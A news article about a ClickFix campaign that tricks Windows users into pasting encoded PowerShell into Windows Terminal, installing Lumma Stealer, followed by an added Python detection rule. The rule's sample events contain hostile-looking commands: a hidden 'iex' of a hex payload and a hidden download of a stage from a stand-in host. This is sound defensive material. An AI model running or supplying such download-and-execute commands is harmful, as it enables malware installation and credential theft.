New ClickFix Attack leverages Windows Terminal for Payload Execution

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Cybersecurity researchers have uncovered a new wave of ClickFix attacks that now exploit Windows Terminal to deliver malicious payloads directly onto victim machines.

Unlike earlier iterations of this social engineering technique, which relied on the Windows Run dialog, this latest campaign leads users into opening a privileged command environment themselves, making it harder to detect and more believable to ordinary users.

ClickFix first appeared in early 2024, when researchers at Proofpoint spotted it delivering fake browser error prompts that tricked users into running harmful commands.

The technique spread fast, and ESET has since recorded a 517% surge in ClickFix attacks throughout 2025, placing it second only to phishing as a global attack vector.

Attackers typically craft fake CAPTCHA pages, phony troubleshooting notices, or urgent security alerts, all designed to pressure victims into reacting before they stop to question the request.

Microsoft Threat Intelligence analysts identified a widespread ClickFix campaign in February 2026 that specifically targeted Windows Terminal as its new execution environment.

Rather than directing victims to the traditional Run dialog through Win + R, this campaign told them to use the Windows + X shortcut followed by “I” to launch Windows Terminal directly.

This approach let attackers sidestep security tools built to flag Run dialog misuse, while placing victims inside a command-line environment that resembles routine IT work.

The damage caused by this campaign is real and measurable. According to Microsoft’s 2025 Digital Defense Report, ClickFix is now the leading initial access method, responsible for 47% of all attacks tracked by Microsoft Defender Experts, outpacing traditional phishing at 35%.

The final payload in this latest campaign is Lumma Stealer, a credential-harvesting malware designed to extract saved usernames, passwords, and sensitive browser data from Chrome and Edge.

This campaign is specific to Windows users, and since it abuses human behavior rather than a software flaw, no traditional software patch exists. Security awareness and strict policy controls remain the most effective defenses against this type of attack.

How the Infection Unfolds

The attack begins the moment a victim visits a compromised or malicious website. Hidden JavaScript running behind the page silently copies a hex-encoded, XOR-compressed PowerShell command into the user’s clipboard without any visible indication.

A fake CAPTCHA or verification prompt then appears on screen, impersonating trusted brands like Cloudflare or Microsoft, instructing the user to open Windows Terminal and paste what is in the clipboard to “fix” a supposed issue.

Once the command lands inside Windows Terminal, a PowerShell process decodes the compressed script entirely in memory and begins making outbound connections to attacker-controlled servers.

It downloads a renamed 7-Zip executable and a ZIP archive containing the next stage of the attack. The file is extracted and executed silently, with no visible prompts appearing on screen, leaving the victim with no reason to suspect anything has gone wrong.

The malware then establishes persistence by writing a scheduled task that runs each time the system restarts. Lumma Stealer is dropped into C:\ProgramData\app_config\ctjb and uses QueueUserAPC() injection to insert itself into active browser processes, including chrome.exe and msedge.exe.

Once embedded inside these processes, it reads Login Data and Web Data files stored by the browser, harvesting saved credentials and sensitive autofill entries before sending everything off to the attacker’s remote infrastructure.

Detection is made harder because wt.exe is a trusted system component on many Windows machines. Security monitoring tools may not immediately flag PowerShell activity spawned from Windows Terminal, giving the attacker undetected time to complete the full infection chain.

To reduce exposure to this threat, organizations should train employees to never paste commands into any terminal prompted by a website. Windows Terminal and PowerShell should be restricted to administrative accounts through Group Policy.

Security teams should regularly inspect registry keys under HKCU\Software\Microsoft\Windows\CurrentVersion\Run and review Windows Task Scheduler for unrecognized scheduled tasks.

Endpoint detection tools should be configured to monitor and alert on PowerShell processes spawned by wt.exe, and antimalware definitions should be updated regularly across all endpoints.
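As an added illustration of the monitoring advice above (example code written for this page, not from the article or from Microsoft's report), the rule below flags PowerShell started underneath Windows Terminal whose command line carries a long hex blob, an encoded-command flag, a hidden window, or a download cmdlet. The event format, the file paths and the WindowsTerminal.exe parent name are constructed assumptions; only wt.exe comes from the article.

```python
import re

# Constructed sample events (not real telemetry), "key=value|key=value" form with Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -File C:\scripts\backup.ps1",
    r"ParentImage=C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -NoProfile Get-ChildItem C:\Users",
    r"ParentImage=C:\Users\alice\AppData\Local\Microsoft\WindowsApps\wt.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -nop -w hidden $h='" + "4a6f" * 20 + r"';iex $h",
    r"ParentImage=C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe|Image=C:\Program Files\PowerShell\7\pwsh.exe|CommandLine=pwsh -w hidden -c Invoke-WebRequest http://example.invalid/stage -OutFile $env:ProgramData\7za.exe",
]

# Assumed parent names: wt.exe (named in the article) plus WindowsTerminal.exe, the process that hosts the shell tabs.
TERMINAL_PARENTS = {"wt.exe", "windowsterminal.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
HEX_BLOB = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{64,}(?![0-9a-fA-F])")  # hex-encoded stage pasted from clipboard
ENCODED_FLAG = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\b")
HIDDEN_WINDOW = re.compile(r"(?i)(^|\s)-w(indowstyle)?\s+hidden\b")
DOWNLOAD_CUES = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile", "webclient")

def parse_event(line):
    """Split one record into a dict; only the first '=' of each field is a separator."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()  # lower-cased file name of a Windows path

def classify(event):
    """Reasons this event matches the Windows Terminal -> PowerShell pattern; [] when it does not."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent not in TERMINAL_PARENTS or image not in POWERSHELL_IMAGES:
        return []  # the rule is scoped to shells spawned by Windows Terminal only
    reasons = []
    if HEX_BLOB.search(cmd):
        reasons.append("long hex blob in command line")
    if ENCODED_FLAG.search(cmd):
        reasons.append("encoded command flag")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    if any(cue in cmd.lower() for cue in DOWNLOAD_CUES):
        reasons.append("download cmdlet")
    return reasons

def scan(lines):
    """(parent, image, reasons) for each event that triggers the rule; interactive use stays silent."""
    events = [parse_event(line) for line in lines]
    return [(basename(e["ParentImage"]), basename(e["Image"]), r) for e in events if (r := classify(e))]
```

Running `scan(SAMPLE_EVENTS)` flags only the two pasted-payload events; the routine Get-ChildItem session under Windows Terminal and the script launched from explorer.exe stay quiet.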
